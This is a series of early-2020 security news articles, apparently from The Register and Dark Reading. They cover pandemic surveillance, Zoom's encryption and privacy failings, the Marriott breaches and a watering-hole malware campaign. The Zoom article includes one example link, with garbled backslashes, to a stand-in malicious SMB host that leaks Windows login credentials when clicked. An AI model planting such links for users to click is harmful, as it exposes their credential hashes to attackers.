STE WILLIAMS

Australian state will install home surveillance hardware to make sure if you’re in virus isolation, you stay there

The State of Western Australia has given itself the power to install surveillance devices in homes, or compel people to wear them, to ensure that those required to isolate during the coronavirus crisis don’t interact with the community.

Not all people will be required to use the devices. State Premier [equivalent to a US governor – ed.] Mark McGowan said they’ll only be used if: “Someone who is directed to self-isolate and fails to comply.”

The law enabling the regime, passed yesterday after very brief debate, is the Emergency Management Amendment (COVID-19 Response) Bill 2020 [PDF]. It outlines the monitoring regime, and the fact that the State Emergency Coordinator has the power to require use of surveillance hardware.

If the Coordinator makes that decision, they have the power to:

  • Direct the person to wear an approved electronic monitoring device.
  • Direct the person to permit the installation of an approved electronic monitoring device at the place where the person resides or, if the person does not have a place of residence, at any other place specified by the officer.
  • Give any other reasonable direction to the person necessary for the proper administration the electronic monitoring of the person.

Attempts to damage, remove or interfere with the operation of the devices, or refusal to hand one over to authorised officers, can result in a year behind bars, or a fine of AU$12,000 (US$7,400, £5,900).

The Register has learned of smartphone-based surveillance in aid of coronavirus-crimping in Taiwan, Singapore and Hong Kong, plus the UK is clearing policy roadblocks to make it possible. Russia has used facial recognition and public security cameras to detect quarantine-breakers.

virus

Cops charge prankster who ‘corona-coughed’ on aged officer and had it filmed

READ MORE

But we’ve not found evidence of on-premises or wearable surveillance in any jurisdiction other than Western Australia. We have, however, found one opinion that the state’s actions aren’t out of bounds.

The Nuffield Council on Bioethics, a London-based think tank, has issued a “Guide to the ethics of surveillance and quarantine for novel coronavirus” [PDF]. The guide considers surveillance to detect symptoms is fine, and also adds the following:

The avoidance of significant harm to others who are at risk from a serious communicable disease may outweigh the consideration of personal privacy or confidentiality, and on this basis it can be ethically justified to collect non-anonymised data about individuals for the purpose of implementing control measures.

However, any overriding of privacy or confidentiality must be to the minimum extent possible to achieve the desired aim.

The Register has asked the Western Australian government to detail the devices it intends to use, and if it has them to hand. We have not received a response to our request at the time of writing and will update this story if we receive any information. ®

Sponsored:
Practical tips for Office 365 tenant-to-tenant migration

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/04/01/west_australia_isolation/

Zoom’s end-to-end encryption isn’t actually end-to-end at all. Good thing the PM isn’t using it for Cabinet calls. Oh, for f…

UK Prime Minister Boris Johnson sparked security concerns on Tuesday when he shared a screenshot of “the first ever digital Cabinet” on his Twitter feed. It revealed the country’s most senior officials and ministers were using bog-standard Zoom to discuss critical issues facing Blighty.

The tweet also disclosed the Zoom meeting ID was 539-544-323, and fortunately that appears to have been password protected. That’s a good thing because miscreants hijacking unprotected Zoom calls is a thing.

Crucially, the use of the Zoom software is likely to have infuriated the security services, while also raising questions about whether the UK government has its own secure video-conferencing facilities. We asked GCHQ, and it told us that it was a Number 10 issue. Downing Street declined to comment.

The decision to use Zoom, as millions of others stuck at home during the coronavirus outbreak are doing, comes as concerns are growing about the conferencing app’s business model and security practices.

Most notably, the company has been forced to admit that although it explicitly gives users the option to hold an “end-to-end encrypted” conversation and touts end-to-end encryption as a key feature of its service, in fact it offers no such thing.

Specifically, it uses TLS, which underpins HTTPS website connections and is significantly better than nothing. But it most definitely is not end-to-end encryption (E2E). E2E ensures all communications are encrypted between devices so that not even the organization hosting the service has access to the contents of the connection. With TLS, Zoom can intercept and decrypt video chats and other data.

When we say end-to-end…

Despite Zoom offering a meeting host the option to “enable an end-to-end (E2E) encrypted meeting,” and providing a green padlock that claims “Zoom is using an end to end encrypted connection,” it appears that the company is able to access data in transit along that connection, and can also be compelled to provide it to governments. So, it’s not E2E.

People using a Google Jamboard

Yeah, that Zoom app you’re trusting with work chatter? It lives with ‘vampires feeding on the blood of human data’

READ MORE

While that is not something that will bother most Zoom users, whose conversations are not highly sensitive nor confidential, for something like a UK Cabinet meeting, the lack of true end-to-end encryption is dangerous.

Under questioning, a Zoom spokesperson admitted: “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

Then they gave their own Zoom version of what the phrase “end-to-end encryption” actually means: “When we use the phrase ‘End to End’ in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point,” a spokesperson told The Intercept on Tuesday.

The use of “end point” in this context refers to Zoom servers, not just Zoom clients; a second layer of purposefully misleading semantics.

So when we say user privacy…

That’s not the only area where Zoom has been found wanting. As a spotlight has swung on the biz thanks to its enormous take-up in recent weeks, its dodgy data sharing policies were also revealed.

As we reported earlier this month, Zoom granted itself the right to mine your personal data and conference calls to target you with ads, and seemed to have a “creepily chummy” relationship with tracking-based advertisers.

Personal information gathered by the company included, but was not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. It also included “the content contained in cloud recordings, and instant messages, files, whiteboards … shared while using the service.”

In other words, it was, arguably, the Facebook of the video-conferencing world, sucking every piece of data it can from you and any device you install it on.

Speaking of Facebook, Zoom’s iOS app sent analytics data to Facebook even if you didn’t use Facebook to sign into Zoom, due to the application’s use of the social network’s Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn’t say anything about what happens if you don’t use Facebook. Zoom has since corrected its code to not send analytics to the social network if you don’t use it to sign into the video-conferencing app.

Zoom also stupidly glomed users together, as if they were working for the same company, because they used a common email provider, such as xs4all.nl.

Privacy advocacy group Access Now, meanwhile, dug into Zoom’s privacy policy and practices and didn’t like what it saw, sending a letter to the company on March 19 asking it to publish a transparency report along the same lines as other companies that made it plain exactly what the company was doing with its users’ data.

“The growing demand for Zoom’s services makes it a target for third parties, from law enforcement to malicious hackers, seeking personal data and sensitive information,” said Access Now’s general counsel Peter Micek. “This is why just disclosing privacy policies is not enough – it’s high time for Zoom to tell us how they protect our personal lives and professional activities from exploitation. This starts with a regular transparency report.”

The Facebook API kerfuffle resulted in a lawsuit [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, is looking to bring a class action against Zoom for failing to protect personal data.

He argued Zoom has violated three Californian laws: the Unfair Competition Law, Consumers Legal Remedies Act, and Consumer Privacy Act by collecting and providing personal information to third parties including Facebook.

“Had Zoom informed its users that it would use inadequate security measures and permit unauthorized third-party tracking of their personal information, users would not have been willing to use the Zoom app,” the lawsuit argued.

In short, while Zoom’s ease of use, reliability and excellent user interface has made it a godsend for people stuck at home, the company continues to raise red flags about its honesty, its privacy policies and its business model. Something that a country’s head of government would do well to consider before posting screengrabs of online meetings. ®

Stop press… Zoom has quietly rewritten its privacy policy since our earlier coverage to now stress: “We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data.”

It continued: “Your meetings are yours. We do not monitor them or even store them after your meeting is done unless we are requested to record and store them by the meeting host … We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites.”

It, thus, appears to have clarified, among other things, that it, at least now, does not use the content of meetings and messages to generate targeted advertising.

PS: Zoom has an attention-tracking feature, which can be turned on by a meeting host, that alerts the host if you click away from the Zoom conference for more than 30 seconds.

PPS: It appears you can snaffle people’s Windows local login usernames and hashed passwords via Zoom by getting them to click on a URL in a chat message that connects to a malicious SMB file server. A link such as \evil.server.comfoorbar.jpg will, when clicked on, cause Windows to connect to evil.server.com, supplying the logged-in user’s credentials in hope of fetching foobar.jpg.

Sponsored:
Practical tips for Office 365 tenant-to-tenant migration

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/04/01/zoom_spotlight/

Singapore government scraps physical 2FA tokens for government services

Singapore will bin the physical tokens used to provide two-factor authentication (2FA) for some digital government services.

The city-state operates “SingPass”, a government service that connects Singapore’s residents with 200 government services. SingPass helps residents to file taxes, apply for public housing, or checking the balance of their pension accounts.

In 2016, the government enabled two-factor authentication (2FA) for SingPass accounts to improve security. The measures required users to input a code from a physical “OneKey” token in addition to their regular password to access their accounts.

But today the government announced plans to scrap the physical tokens, which account for only two per cent of logins. New tokens and replacements will not longer be issued from October, and they will stop working entirely from April next year, the government said.

The government is instead encouraging users to use the SingPass Mobile app, which was released in 2018. The app uses fingerprint, face recognition, or a six-digit passcode to grant access and, together with SMS 2FA, account for 98 per cent of logins.

In addition to the regular government services, SingPass Mobile also allows users to access selected private sector services, such as insurance and the grants portal on the Singapore National Employers Federation website.

Users who cannot use the app can continue to access the online services by setting up SMS 2FA, which will send a code to their mobile phones, or visit one of the 46 SingPass retail outlets across the island.

But the app is preferred. As it should be, given 2015 advice from the United States’ National Institute of Standards and Technology that SMS 2FA is not sufficiently secure.

Kok Ping Soon, chief exec of Singapore’s digital transformation team, GovTech, said: “The SingPass Mobile app is key to Singapore’s national digital identity initiative. We are encouraged by the strong support so far and will do more to promote the use of the app, so that more users can transact online with the government and private sector easily and conveniently.”

“We will also work with our partner agencies to help more citizens learn how to use SingPass Mobile, and continue to find new solutions which ensure security and convenience for our citizens.” ®

Sponsored:
Practical tips for Office 365 tenant-to-tenant migration

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/04/01/singapores_government_scraps_physical_tokens/

Marriott Hotels hacked AGAIN: Two compromised employee logins abused to siphon off guests’ personal info

Marriott Hotels has suffered its second data spillage in as many years after an “unexpected amount” of guests’ data was accessed through two compromised employee logins, the under-fire chain has confirmed.

The size of the latest data exposure has not been disclosed, though Marriott admitted it seemed to have started in January 2020 and was detected “at the end of February.”

“We identified that an unexpected amount of guest information may have been accessed using the login credentials of two employees at a franchise property,” said Marriott, without identifying which of its 6,900 hotels worldwide was at the epicenter of the intrusion.

“Upon discovery, we confirmed that the login credentials were disabled, immediately began an investigation, implemented heightened monitoring, and arranged resources to inform and assist guests,” it continued.

Marriott did not explain why it took four weeks to begin alerting customers about the digital break-in.

Stolen data included name, postal and email addresses, phone numbers, Bonvoy loyalty card balance, gender, date of birth, linked loyalty scheme information from other companies and room/personal preferences.

The hotel chain asserted that credit card data, PINs, passport and driver’s licence information was not accessed by the hackers, whose identities are so far unknown.

Bob Rudis of infosec biz Rapid7 commented: “The use of stolen, legitimate credentials is still one of the most popular attack vectors for our adversaries. It is also paramount that you continue to watch for anomalous behaviour of systems and accounts to reduce the time attackers have to accomplish their goals if they do manage to breach your defences.”

Guests are now being emailed from [email protected], with the company publishing a self-help portal so you can, er, input your personal data to find out whether it was exposed or not. A link is available from the Marriott security breach notification page. For affected Brits, an 0800 number is provided so one can bellow enraged obscenities at some call centre drone obtain further information.

Free Experian identity monitoring is also being provided to those affected. The idea of this is to notify you if criminals are using your stolen details to clone your identity.

If you are involved, Marriott said in its statement it would force password resets and prompt users to enable multi-factor authentication.

Back in 2018 Marriott lost control of 383 million people’s personal data after China-based criminals broke into its Starwood brand’s guest database. Included in that hack were 8.6 million “encrypted” credit card numbers, though the hotel chain insisted that all but a mere 354,000 had expired by the time staff realised what had happened.

The data spillage will come as bad news for Marriott’s lawyers and beancounters, who thought they had been successful in kicking the UK ICO’s £99m fine for the 2018 breach into the long grass. And lest we all forget, in 2014 the hotel chain was caught red-handed blocking guests’ own Wi-Fi hotspots in a vain attempt to force them to buy expensive hotel Wi-Fi access instead. ®

Sponsored:
Webcast: Why you need managed detection and response

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/03/31/marriott_hotels_hacked_again/

Epic Games floats $1m bounty to ID source of ‘commercial smear’ claiming Houseparty chat app has been hacked

Group video chat app Houseparty has offered a $1m bounty to identify what it claims is an organised campaign to falsely depict it as a hackers’ backdoor.

Announced at 4am UTC on the firm’s Twitter account, the million-dollar bounty is being offered to “the first individual to provide proof of such a campaign,” with Epic Games, the firm behind Houseparty, alleging this effort is “a paid commercial smear… to harm Houseparty.”

The app has exploded in popularity since most of the world entered coronavirus lockdown as a replacement for interacting within venues such as pubs, coffee shops and restaurants. Most people use it to livestream themselves drunkenly trying out filters that turn their fizzogs into cartoon dogs and so on.

Over the last few days, rumours have been seeded on Twitter that Houseparty is linked to people’s online accounts being hacked. The ever-reliable online wing of the Daily Mail gathered together a slack handful of tweets alleging Houseparty was the cause of account compromises. El Reg had a quick look at the first account mentioned in the Mail writeup and discovered a Twitter thread where the account operator cheerfully admitted to reusing usernames and passwords across different sites: an obvious path to multi-account compromise.

While The Register is not aware of any genuine concerns over Houseparty, these particular rumours do seem short of the mark. Bored readers trapped at home might enjoy using some social media verification techniques (PDF, 79 pages, dates back to 2016 but the basics are sound) to check out more of the same.

“We’ve found no evidence to suggest a link between Houseparty and the compromises of other unrelated accounts,” a spokesperson for Epic Games told the BBC.

Bounties are vanishingly rare these days in the corporate tech world, normally being restricted to governmental prosecutors trying to lay hands on overseas criminals, as with US Federal prosecutors who want to arrest two Russians allegedly behind an online malware operation. ®

Sponsored:
Webcast: Why you need managed detection and response

Article source: https://go.theregister.co.uk/feed/www.theregister.co.uk/2020/03/31/houseparty_bounty_1m_dollars_commercial_smear_claim/

Patching Poses Security Problems with Move to More Remote Work

Security teams were not ready for the wholesale move to remote work and the sudden expansion of the attack surface area, experts say.

A growing body of survey data suggests that the move to remote work has caused a growing number of headaches for security teams, especially regarding securing remote systems and maintaining up-to-date software through patching. 

In mid-March, 45% of companies encouraged workers to move to remote working, up from only 13% of companies in 2018, according to IT community Spiceworks. Yet security teams consider their company’s capability to patch remote systems to be inadequate, according to a recent study released by Automox, a cyber-hygiene tools provider. While 48% of security teams patch on-premises desktops and laptops in the first three days, that declines to 42% for remote desktops and laptops, according to the firm.

“Remote desktops usually play second fiddle in terms of patching and prioritization — it’s usually more difficult to manage them,” says Chris Hass, director of information security and research for Automox. “Most teams have a good idea of what is going on with the corporate machines, but they often don’t have any visibility into remote workers’ systems, so there absolutely has been a large increase in the attack surface because of remote work.”

A major impact on businesses from the coronavirus pandemic is the speed with which companies have moved to remote working, changing the way that employees access business applications and increasing the potential attack surface area — a particular headache for IT security. 

Most companies were not prepared for such a broad-based move to working remotely. While, on the whole, anywhere from 56% to 62% of employees could work from home, according to remote work analyst Global Workplace Analytics, only 14% of companies were prepared to handle a significant crisis and move the workforce to remotely access software and applications, according to a survey by Spiceworks of IT professionals 

Because companies were taken by surprise, most are not prepared to patch and attest to the security of remote systems, says AJ Singh, co-founder and vice president of product management for remote management services firm NinjaRMM.

“Remote work has absolutely increased the complexity and scale of patch management in organizations,” he says. “Now, in addition to maintaining and patching servers and devices on-prem, IT professionals must also manage the devices used by remote workers, making sure they are secure before accessing a business’s data.”

Patching is already an expensive proposition, with hundreds and thousands of vulnerabilities affecting a business’s software and systems, says Sumedh Thakar, president and chief product officer at Qualys. The only way for most companies to deal with the issue is to prioritize the vulnerabilities based on the criticality of the assets affected by the issues. For example, companies should only focus on the BlueKeep vulnerability if they have Remote Desktop Protocol (RDP) services in place, for example. 

However, the move to remote work has changed the calculus of prioritization for many companies and reduced their visibility, he says.

“It is becoming immediately clear that traditional enterprise security solutions deployed inside the organization’s network are completely ineffective in patching [and] remediating these remote endpoints due to the pressure they would put on VPN concentrators, bandwidth for deploying patches or sheer amount of time they would put to tweak these solutions,” Thakar says, adding: “Now, prioritization based on risk becomes interesting because vulnerabilities critical for these remote endpoints are probably different than those posing risk to traditional server farms.”

Automation is another critical tool for better handling the patching of remote workers’ systems. To get patching under control, businesses need to have the right tools in place to automate large parts of the patching process, says NinjaRMM’s Singh.

“Ultimately, companies need to accept the fact that patch management is a constant chore regardless of remote work or working in an office,” he says. “For the foreseeable future, however, it will be more important than ever to make sure end users’ machines are tightly secured to avoid any loss or breach of sensitive data.”

For vendors, the move to extensive remote working may result in significant business. While 44% of companies had already committed to spending more on IT in 2020, now 39% have further increased their budgets, according to Spiceworks

And remote working is the area most in need of improvement, the survey found. Almost all — 92% — of IT professionals are concerned about the security of company-owned devices used from home and connecting to a home network.

Related Content

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Untangling Third-Party Risk (and Fourth, and Fifth…).”

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/vulnerability-management/patching-poses-security-problems-with-move-to-more-remote-work/d/d-id/1337451?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Why Third-Party Risk Management Has Never Been More Important

Given today’s coronavirus pandemic, the need for companies to collect cybersecurity data about their business partners is more critical than ever. Here’s how to start.

Over recent weeks, the ongoing spread of the COVID-19 coronavirus has forced companies around the country to make difficult decisions about how to protect their employees — as well as their communities as a whole.

In an effort to halt the spread of the virus, many organizations are instituting mandatory work-from-home (WFH) policies, engaging with new cloud service providers, and shifting resources toward supporting an expanding remote workforce. In responding to real business needs, they now face a variety of new, complex cybersecurity challenges from an expanding attack surface — both internally and within their third-party networks.

Work from Home Insecure External Networks
Under the best of circumstances, it’s difficult for security teams to enforce stringent controls and policies when employees are operating from disparate locations on various networks and devices. In the wake of COVID-19, with newly remote home workers logging on to unpatched machines through unsecured Wi-Fi networks that haven’t connected to the corporate VPN in days or weeks, the dangers are even more of a threat.

In fact, new concerns about “external network” security have become top of mind for security teams. The National Institute of Standards and Technology recently issued an urgent bulletin outlining challenges and best practices, suggesting that “organizations should also assume that communications on external networks, which are outside of the organization’s control, are susceptible to eavesdropping, interception, and modification.” Organizations are now seeking to better understand the security posture of the external network.

Compounding this challenge, opportunistic hackers are taking advantage of the ongoing fear to target individuals with phishing emails that appear to come from an official source, such as the Centers for Disease Control (CDC). These emails contain a malware-ridden attachment that infects the computer in question and steals the individual’s personal information. These risk factors are hard to assess and mitigate in your own organization — and even more difficult to monitor when it comes to third- and fourth-party networks, where you have less visibility and control.

Vendor Assessment and COVID-19
Given the current coronavirus pandemic, the need for companies to collect cybersecurity data about their vendors has never been more critical. That being said, recent travel bans and widespread WFH policies prevent on-site evaluations from being a viable option, completely upending traditional ways of assessing third-party risk. In addition, organizations that have previously leveraged consultants to aid in evaluation processes will now need to rethink their approach because most consultants will no longer be traveling, at least for the short and medium term.

Of course, existing or new manual assessment processes will be slower and more stressful due to the challenges that come with a newly remote workforce, not to mention a reduced access to the latest technology, such as video conferencing for brainstorming sessions and planning meetings that will be increasingly difficult when everyone is in a different location and relying on potentially flawed home Wi-Fi networks.

To promote efficient and effective vendor assessment and onboarding processes in these conditions, it’s critical to streamline and automate wherever possible. Many organizations will need to completely rethink their assessment schedule and policy to include more remote monitoring capabilities. By leveraging a dynamic, standardized cyber-risk key performance indicator (KPI), like security ratings to assess each potential vendor’s security posture side-by-side, you can immediately identify areas of risk that require attention — and make data-driven evaluation decisions under the limited remote resources you have today due to the coronavirus. [Disclosure: The author is an executive of a company that provides security ratings to help companies evaluate third-party risk.]

Developing Remediation Contingencies
Once a vendor has been onboarded, it’s critical to continuously monitor their security posture to ensure they’re maintaining the previously agreed-upon risk thresholds. As security ratings are updated on a daily basis, you can easily leverage this data to track any security shifts in your third-party network from your remote working location.

Of course, monitoring only goes so far. If you identify critical vulnerabilities that pose a risk to your ecosystem, you need to have a remediation plan in place. That being said, in this brave new world of mandated WFH policies, your previously agreed-upon plans will likely need to be reassessed and updated.

As part of your third-party risk management initiative, make sure you align how your current vendors will handle any security issues that arise within your remote workforce over the coming weeks and months. For instance, you should confirm that they have a plan in place to resolve any data center vulnerabilities, given that no employees will likely be permitted to travel there.

As is the case whenever you update vendor security expectations, make sure that any and all contingencies are documented in writing and agreed upon. Outline the preferred forms of communication and be as specific as possible when defining time frame expectations. For instance, you may require that vendors inform you of any breaches within 24 hours and remediate any security issues within 48 hours.

Closing the Security and Communication Gaps
During these uncertain times, it’s more important than ever to be proactive and vigilant when it comes to your organization’s cybersecurity. Don’t let a security incident be the first time you reconnect with your third parties about new processes and standards you need to implement during this global crisis. As the workforce goes remote and new targeted threats become increasingly prevalent, it’s critical to have a plan in place to continuously evaluate and manage both your security posture and that of your vendor ecosystem.

Of course, given the current resource restrictions and unprecedented stress on the overall digital supply chain, all organizations will need to start by reassessing (and potentially overhauling) their existing policies and procedures. In many ways, this is uncharted territory, and no security leader is going to have all the right answers immediately. You must be willing to think outside of the box to accomplish your responsibilities, support your team, and protect your network in this new and evolving risk environment.

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s featured story: “How to Evict Attackers Living Off Your Land.

Jake Olcott is vice president at BitSight Technologies, where he helps organizations benchmark their cybersecurity programs using quantitative metrics. Olcott speaks and writes about the role of directors, officers and executives in cyber-risk management. He served as … View Full Bio

Article source: https://www.darkreading.com/risk/why-third-party-risk-management-has-never-been-more-important/a/d-id/1337431?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Latest Security News & Commentary about COVID-19

Check out Dark Reading’s updated, exclusive news and commentary surrounding the coronavirus pandemic.

3/31/2020
Patching Poses Security Problems with Move to More Remote Work
Security teams were not ready for the wholesale move to remote work and the sudden expansion of the attack surface area, experts say

3/31/2020 
Why Third-Party Risk Management Has Never Been More Important
Given today’s coronavirus pandemic, the need for companies to collect cybersecurity data about their business partners is more critical than ever. Here’s how to start.

3/31/2020
Limited-Time Free Offers to Secure the Enterprise Amid COVID-19
These products and services could be of immediate help to infosec pros now protecting their organizations while working from home.

3/27/2020
Purported Brute-Force Attack Aims at Linksys Routers as More People Work Remotely
The attack takes control of poorly secured network devices, redirecting Web addresses to a COVID-themed landing page that attempts to fool victims into downloading malware.

3/26/2020
How Zoom, Netflix, and Dropbox are Staying Online During the Pandemic
Inside the efforts to keep the quarantined world’s popular Internet services running smoothly.

3/25/2020
COVID-19: Getting Ready for the Next Business Continuity Challenge
What comes after you’ve empowered your remote workforce in the wake of the coronavirus pandemic? Dealing with a large portion of that workforce getting sick at the same time.

3/24/2020
Cybercriminals’ Promises to Pause During Pandemic Amount to Little
As pandemic worsens, online profiteering — from frausters to ransomware operators to cybercriminal hacking — continues unabated, despite some promises from the underground. 

3/23/2020  
FBI Warns of Fake CDC Emails in COVID-19 Phishing Alert
Fraudsters exploit concerns by claiming to offer virus-related information or promising stimulus checks.

3/23/2020  
8 Infosec Page-Turners for Days Spent Indoors
Stuck inside and looking for a new read? Check out these titles written by security practitioners and reporters across the industry.

3/20/2020 
Attack Surface, Vulnerabilities Increase as Orgs Respond to COVID-19 Crisis
In typical fashion, attackers are gearing up to take advantage of the surge in teleworking prompted by the pandemic.

3/19/2020
DDoS Attack Targets German Food Delivery Service
Liefrando delivers food from more than 15,000 restaurants in Germany, where people under COVID-19 restrictions depend on the service.

3/19/2020
VPN Usage Surges as More Nations Shut Down Offices
As social distancing becomes the norm, interest in virtual private networks has rocketed, with some providers already seeing a doubling in users and traffic since the beginning of the year.

3/17/2020 
Attorney General Directs DoJ to Prioritize Coronavirus Crime
Criminal activity related to the pandemic cannot be tolerated, William Barr states in memo.

3/17/2020 
Security Lessons We’ve Learned (So Far) from COVID-19
Takeaways about fighting new fires, securely enabling remote workforces, and human nature during difficult times.

3/16/2020 
Privacy in a Pandemic: What You Can (and Can’t) Ask Employees
Businesses struggle to strike a balance between workplace health and employees’ privacy rights in the midst of a global health emergency.

3/12/2020 
Working from Home? These Tips Can Help You Adapt
COVID-19 means many people are doing their jobs from outside the confines of the office. That may not be as easy as it sounds.

3/9/2020 
Malware Campaign Feeds on Coronavirus Fears
A new malware campaign that offers a “coronavirus map” delivers a well-known data-stealer.

 

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/operations/latest-security-news-and-commentary-about-covid-19/d/d-id/1337452?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Data from 5.2M Marriott Loyalty Program Members Hit by Breach

The data was breached through the credentials of two franchisee employees.

Marriott International has notified some 5.2 million guests that their personal information could have been accessed in the breach of an internal application used to help provide guest services. According to the company, the breach was active from mid-January until the end of February of this year.

The information involved in the leak is part of the data kept on guests as part of Marriott’s Bonvoy loyalty program. The affected information includes contact details (such as name, mailing address, email address, and phone number), loyalty account information (including account number and points balance, but not passwords), additional personal details (such as company, gender, and birthday day and month), partnerships and affiliations (including linked airline loyalty programs and numbers), and preferences (for example, stay/room preferences and language preference). Marriott noted that no account passwords or PINs, payment card information, passport information, national IDs, or driver’s license numbers were part of the breached data.

In the breach notification, Marriott said that the unauthorized access came through the credentials of two employees at a franchise location. The company is offering a year of identity monitoring to all affected guests.

For more, read here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s featured story: “Untangling Third-Party Risk (and Fourth, and Fifth…).

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/data-from-52m-marriott-loyalty-program-members-hit-by-breach/d/d-id/1337453?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Researchers Uncover Unsophisticated – But Creative – Watering

Holy Water campaign is targeting users of a specific religious and ethnic group in Asia, Kaspersky says.

A new malware distribution campaign targeted at users in Asian countries is the latest reminder of why attacks don’t always have to be sophisticated to be effective.

The campaign involves the use of watering-hole websites to drop malware on systems belonging to members of a certain Asian religious and ethnic group. The watering holes have been established on more than 10 websites belonging to individuals, voluntary programs, charities, and other organizations related to the targeted religious group. All that users need to do to for malware to be downloaded on their systems is to simply visit the compromised websites.

Researchers from Kaspersky first spotted the campaign last December and have named it “Holy Water.” In an advisory this week, the security vendor described the campaign as ongoing and involving the use of an unsophisticated but creative toolset that includes open source code, GitHub distribution, and the use of Go language and Google Drive-based command and communication channels.

According to Kaspersky, when a visitor lands on one of the watering holes, an already compromised component on it loads a malicious JavaScript that harvest information about the visitor’s system and sends it off to an external attacker-controlled server. The external server vets the system information to determine whether the user is of potential interest.

If the user is identified as being of interest, another JavaScript loads a plugin that in turn triggers a pop-up urging the user to update their Adobe Flash software. Users who click on the pop-up end up having a backdoor called “Godlike12” installed on their systems. The malware allows the threat actor to take complete remote control of the infected device to steal sensitive data, modify files, gather logs, and conduct other malicious activity, Kaspersky said.

The threat group behind the campaign has also been using a second, modified version of an open source Python backdoor named “Stitch” in the attacks. This backdoor provides the attackers a way to exchange encrypted information with the command-and-control server, the security vendor said in its alert.

Ivan Kwiatkowski, senior security researcher at Kaspersky, says the motive for the Holy Water campaign remains unclear. But it is almost certainly not financially motivated. “Based on the extreme focus of this campaign, we assert that their objective was to gather intelligence on the target population,” he says.

Creative Tactics
What makes the campaign different is how creative the attackers have been in their choice of tools, Kwiatkowski says. The Holy Water campaign has been leveraging free, third-party services instead of a proper infrastructure and made use of modified open source backdoors in its early phases.

“To us, this indicates that the attackers had to work with limited funding but were able to find ways to conduct their operations anyway,” he says.

None of the tools that Kaspersky found the group using contain any state-of-the-art features. “But it is obvious that the group behind this campaign was able to achieve operational efficiency in a short time span,” he says.

Kwiatkowski says Kaspersky has not been able to determine how the attackers initially compromised the websites that are being used as watering holes and planted malware on them. It is likely, though, that they exploited some software vulnerability. All of the water-holed websites that Kaspersky discovered were running WordPress, and a few of them were also hosted on the same IP address, he says.

Kaspersky has also not been able to confirm what information exactly the attackers are looking for in order to determine whether a visitor to one of the watering-hole websites is of interest to them. But based on the system information that is sent to the remote server, it appears the attackers are choosing their victims based on where they are located geographically.

The Holy Water campaign is a reminder why website administrators should keep their software stack up-to-date and have controls for detecting traces of compromise on their machines. “In the case of water-holing attacks, we recommend that measures are taken to detect any unplanned modification to the website’s pages,” Kwiatkowski says.

Websites that support at-risk communities need to pay attention to such campaigns as well, he adds. “[Such sites] are liable to be targeted as well because they are, in a way, access vectors to potential victims.” Kwiatkowski says.

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s featured story: “Untangling Third-Party Risk (and Fourth, and Fifth…).

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/researchers-uncover-unsophisticated---but-creative---watering-hole-attack/d/d-id/1337455?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple